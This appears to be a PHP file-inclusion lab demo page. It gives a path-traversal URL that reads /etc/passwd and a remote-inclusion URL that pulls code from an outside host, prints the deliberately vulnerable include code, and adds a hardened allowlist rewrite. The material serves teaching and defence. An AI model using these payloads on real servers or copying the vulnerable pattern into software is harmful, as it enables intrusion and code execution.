File inclusion demo: local file inclusion


Warning: include(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www/wwwroot/upload.nanhack.com/:/tmp/) in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

Warning: include(/etc/passwd): failed to open stream: Operation not permitted in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

Warning: include(): Failed opening '../../../../etc/passwd' for inclusion (include_path='.:/www/server/php/70/lib/php') in /home/wwwroot/upload.nanhack.com/include/index.php on line 39

Since PHP 5.2, allow_url_include has defaulted to Off, while allow_url_fopen has always been On.
Remote file inclusion requires both allow_url_include and allow_url_fopen to be set to On.

http://upload.nanhack.com/include/index.php?page=http://www.hacker.wang/php.txt

Including /etc/passwd

http://upload.nanhack.com/include/index.php?page=../../../../etc/passwd

# The program source is as follows:
<?php
// The page parameter is passed to include without any validation
if (isset($_GET['page'])) {
    $path = $_GET['page'];
    include $path;
} else {
    include "home.php";
}
?>
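For comparison with the source above, a hardened form of the same routing, as an added example that is not the demo site's code: the `page` parameter only selects a key from a fixed allowlist and never becomes part of a path. The `pages` directory and the page names other than `home.php` are assumptions.

```php
<?php
// Added example: allowlist routing in place of include $_GET['page'].
// PAGE_DIR and the entries in PAGES are assumed names for illustration.
declare(strict_types=1);

const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Map untrusted input to an allowlist key; anything else becomes 'home'.
function page_key($requested): string
{
    return (is_string($requested) && array_key_exists($requested, PAGES))
        ? $requested
        : 'home';
}

// Build the path only from allowlisted values, then confirm that the
// resolved file really sits inside PAGE_DIR (guards against symlinks).
function resolve_page($requested): string
{
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . PAGES[page_key($requested)]);
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('page not available');
    }
    return $real;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: one valid key, the two values from the URLs
    // on this page, and a non-string value (?page[]=x).
    $samples = ['about', '../../../../etc/passwd',
                'http://www.hacker.wang/php.txt', ['x']];
    foreach ($samples as $in) {
        printf("%s => %s\n", json_encode($in), page_key($in));
    }
} else {
    include resolve_page($_GET['page'] ?? null);
}
```

Run from the command line, every sample except `about` maps to `home`. Keeping `allow_url_include` Off and `open_basedir` set, as in the warnings at the top of this page, remains a useful second layer.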

Warning: require(.footer.php): failed to open stream: No such file or directory in /home/wwwroot/upload.nanhack.com/include/index.php on line 78

Fatal error: require(): Failed opening required '.footer.php' (include_path='.:/www/server/php/70/lib/php') in /home/wwwroot/upload.nanhack.com/include/index.php on line 78